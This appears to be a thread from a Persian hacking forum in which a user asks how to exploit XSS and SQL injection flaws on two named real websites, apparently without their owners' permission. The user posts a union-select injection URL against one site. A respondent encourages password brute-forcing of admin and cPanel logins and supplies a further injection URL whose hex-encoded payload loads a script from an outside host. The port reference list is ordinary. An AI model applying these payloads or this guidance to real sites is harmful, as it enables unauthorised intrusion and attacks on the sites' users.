3 ارسال در این موضوع قرار دارد

سلام دوستان 
یه سایت(چت روم خارجی) رو اسکن کردم که باگ xss  داره ولی نمیدونم چجوری باید به این باگ نفوذ کرد 

نتیجه اسکن bug.png.52b3a9d43ab307d8ce221e5bb6510e71.png
دوتا روش تو انجمن دیدم که یکی تزریق این کد بود 

<script>alert(document.cookie)</script>

ولی وقتی اینو تو قسمت  عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست 
 
و روش دوم ریختن اسکریپت کیلاگر توسط باگ xss بود که اینم باید تو ادمین پیج انجام میدادی که نمیشد

وقتی سایت رو اسکن کردم vega یه سری کوکی هم اوورد به نظرتون اونا بدرد میخوره !!!!     whatweb هم یه سری کوکی بهم داد اینا به کار میان !!!
سایت cpanel  داره راهی برای نفوذ به cpanel هست !!
از ابزار brutesploit   میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! 
از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! 
سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید  25-53-80-110-119-143


==============================================================================================================================================================

و سایت دوم که باگ sql  داشت (این سوال رو  یبار پرسیدم ولی جوابی نگرفتم )
من تو قسمت فراخوانی تیبل ادمین مشکل دارم 
این سایت دارای باگ = http://www.jabrennan.com
اینم تمام تیبل هایی که داره =

CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE

من تیبل USER  رو به هگز=(0x55534552) تبدیل کردم و دستورات رو به این شکل وارد کردم ولی نتیجه ای نگرفتم !

http://www.jabrennan.com/news_display.php?id=-1397+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+%20information_schema.columns+where+table_name=0x55534552--

 

اساتید لطفا راهنمایی کنید 

 

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

با سلام دوست عزیز

در جواب شما میتوان گفت کارتون خوبه اما مفاهیم رو اصلا یاد نگرفتید و چند نکته :

1-

دوتا روش تو انجمن دیدم که یکی تزریق این کد بود 

<script>alert(document.cookie)</script>

ولی وقتی اینو تو قسمت  عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست 

 

این حمله طی آسیب پذیری‌ای صورت می‌گیره که در آن داده‌های وارد شده توسط حمله کننده یا هکر، بدون فیلتر شدن تحویل کاربر داده می‌شه.

این داده‌ها می‌توانند کدهای جاوا اسکریپتی باشند که در سمت مرورگر کاربر اجرا شده و کارهای مختلفی می‌تواند برای هکر انجام دهد.

این از این

و دیگری

2-

سایت cpanel  داره راهی برای نفوذ به cpanel هست !!
از ابزار brutesploit   میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! 
از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! 
سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید  25-53-80-110-119-143

جواب:

بله یکی از مرسوم ترین روش تست و امنیت در پنل ها یکیش استفاده از بروتر هستش (نیاز به پس لیست خوب داری)

در مورد پورتها هم باز برمیگرده به همون جواب اولی که مفاهیم رو درک نکردید و باید مطالعه داشته باشید باز یه نگاهی بندازین به این پورتها و ببینین که این پورتهای شما پورتهای عمومی و نیاز به باز بودن هستش

Port 21 –> TCP –> FTP File Transfer Protocol
Port 22 –> TCP/UDP –> SSH ssh,scp copy or sftp
Port 23 –> TCP/UDP –> Telnet
Port 25 –> TCP/UDP –> SMTP for sending outgoing emails
Port 43 –> TCP –> WHOIS function
Port 53 –> TCP/UDP –> DNS Server DNS lookup uses UDP and Zone transfers use TCP
Port 70 –> TCP –> Gopher Protocol
Port 79 –> TCP –> Finger protocol
Port 110 –> TCP –> POP3 for receiving email
Port 119 –> TCP –> NNTP Network News Transfer Protocol
Port 143 –> TCP/UDP –> IMAP4 Protocol for email service
Port 194 –> TCP –> IRC
Port 389 –> TCP/UDP –> LDAP light weight directory access
Port 443 –> TCP –> Secure HTTP over SSL https
Port 465 –> TCP –> Secure SMTP email using SSL
Port 990 –> TCP/UDP –> Secure FTP using SSL
Port 993 –> TCP –> Secure IMAP protocol over SSL for emails
Port 1433 –> TCP/UDP –> Microsoft SQL server port
Port 2082 –> TCP –> CPanel default port
Port 2083 –> TCP –> CPanel over SSL
Port 2086 –> TCP –> CPanel Webhost Manager default
Port 2087 –> TCP –> CPanel Webhost Manager with https
Port 2095 –> TCP –> CPanel Webmail
Port 2096 –> TCP –> Cpanel secure webmail over SSL
Port 2222 –> TCP –> DirectAdmin Server Control Panel
Port 3306 –> TCP/UDP –> MySQL Database Server
Port 4643 –> TCP –> Virtuosso Power Panel
Port 5432 –> TCP –> PostgreSQL Database Server
Port 8080 –> TCP –> HTTP port alternative one for port 80
Port 8087 –> TCP –> Plesk Control Panel Port default
Port 8443 –> TCP –> Plesk Server Control Panel over SSL
Port 9999 –> TCP –> Urchin Web Analytics
Port 10000 –> TCP –> Webmin Server Control Panel

 

در مورد سوال پایینی:

 

http://www.jabrennan.com/news_display.php?id=-7931+union+all+select+0x31,0x32,0x33,0x34,0x35,0x36,((0x3c736372697074207372633d27687474703a2f2f7873732e39662e636f6d2f73716c2e6a73273e3c2f7363726970743e)),0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232--+

من یک نمونه از روشی که میتونی استفاده کنی رو مطرح کردم

ولی در مورد پیدا کردن ادمین شما باید یکی یکی از تیبل هارو فراخونی کنی و ببینی داخل کدوم قرار داره احتمال داره ادمین داخل یکی از اونهایی باشه که بهش شک ندارید

درمورد تست شما میتونم بگم شما یکبار هم با نوریدایرکت پیج ادمین رو هم تست کنید ببینید جواب میگیرید یانه چون بعد وارد کردن رمز اشتباهی میره به پیج پنل بعد خطا رو نشون میده

باز مشکلی بود در خدمتم

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 54 دقیقه قبل، 0r0b4s گفته است :

با سلام دوست عزیز

در جواب شما میتوان گفت کارتون خوبه اما مفاهیم رو اصلا یاد نگرفتید و چند نکته :

1-

دوتا روش تو انجمن دیدم که یکی تزریق این کد بود 


<script>alert(document.cookie)</script>

ولی وقتی اینو تو قسمت  عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست 

 

این حمله طی آسیب پذیری‌ای صورت می‌گیره که در آن داده‌های وارد شده توسط حمله کننده یا هکر، بدون فیلتر شدن تحویل کاربر داده می‌شه.

این داده‌ها می‌توانند کدهای جاوا اسکریپتی باشند که در سمت مرورگر کاربر اجرا شده و کارهای مختلفی می‌تواند برای هکر انجام دهد.

این از این

و دیگری

2-

سایت cpanel  داره راهی برای نفوذ به cpanel هست !!
از ابزار brutesploit   میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! 
از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! 
سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید  25-53-80-110-119-143

جواب:

بله یکی از مرسوم ترین روش تست و امنیت در پنل ها یکیش استفاده از بروتر هستش (نیاز به پس لیست خوب داری)

در مورد پورتها هم باز برمیگرده به همون جواب اولی که مفاهیم رو درک نکردید و باید مطالعه داشته باشید باز یه نگاهی بندازین به این پورتها و ببینین که این پورتهای شما پورتهای عمومی و نیاز به باز بودن هستش


Port 21 –> TCP –> FTP File Transfer Protocol
Port 22 –> TCP/UDP –> SSH ssh,scp copy or sftp
Port 23 –> TCP/UDP –> Telnet
Port 25 –> TCP/UDP –> SMTP for sending outgoing emails
Port 43 –> TCP –> WHOIS function
Port 53 –> TCP/UDP –> DNS Server DNS lookup uses UDP and Zone transfers use TCP
Port 70 –> TCP –> Gopher Protocol
Port 79 –> TCP –> Finger protocol
Port 110 –> TCP –> POP3 for receiving email
Port 119 –> TCP –> NNTP Network News Transfer Protocol
Port 143 –> TCP/UDP –> IMAP4 Protocol for email service
Port 194 –> TCP –> IRC
Port 389 –> TCP/UDP –> LDAP light weight directory access
Port 443 –> TCP –> Secure HTTP over SSL https
Port 465 –> TCP –> Secure SMTP email using SSL
Port 990 –> TCP/UDP –> Secure FTP using SSL
Port 993 –> TCP –> Secure IMAP protocol over SSL for emails
Port 1433 –> TCP/UDP –> Microsoft SQL server port
Port 2082 –> TCP –> CPanel default port
Port 2083 –> TCP –> CPanel over SSL
Port 2086 –> TCP –> CPanel Webhost Manager default
Port 2087 –> TCP –> CPanel Webhost Manager with https
Port 2095 –> TCP –> CPanel Webmail
Port 2096 –> TCP –> Cpanel secure webmail over SSL
Port 2222 –> TCP –> DirectAdmin Server Control Panel
Port 3306 –> TCP/UDP –> MySQL Database Server
Port 4643 –> TCP –> Virtuosso Power Panel
Port 5432 –> TCP –> PostgreSQL Database Server
Port 8080 –> TCP –> HTTP port alternative one for port 80
Port 8087 –> TCP –> Plesk Control Panel Port default
Port 8443 –> TCP –> Plesk Server Control Panel over SSL
Port 9999 –> TCP –> Urchin Web Analytics
Port 10000 –> TCP –> Webmin Server Control Panel

 

در مورد سوال پایینی:

 


http://www.jabrennan.com/news_display.php?id=-7931+union+all+select+0x31,0x32,0x33,0x34,0x35,0x36,((0x3c736372697074207372633d27687474703a2f2f7873732e39662e636f6d2f73716c2e6a73273e3c2f7363726970743e)),0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232--+

من یک نمونه از روشی که میتونی استفاده کنی رو مطرح کردم

ولی در مورد پیدا کردن ادمین شما باید یکی یکی از تیبل هارو فراخونی کنی و ببینی داخل کدوم قرار داره احتمال داره ادمین داخل یکی از اونهایی باشه که بهش شک ندارید

درمورد تست شما میتونم بگم شما یکبار هم با نوریدایرکت پیج ادمین رو هم تست کنید ببینید جواب میگیرید یانه چون بعد وارد کردن رمز اشتباهی میره به پیج پنل بعد خطا رو نشون میده

باز مشکلی بود در خدمتم

================================================
تشکر ویژه از مدیر عزیز  به خاطر پاسخ گویی سریع به سوالات 
حتما کارایی که گفتید رو انجام میدم و اگه سوالی بود مزاحم میشم 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری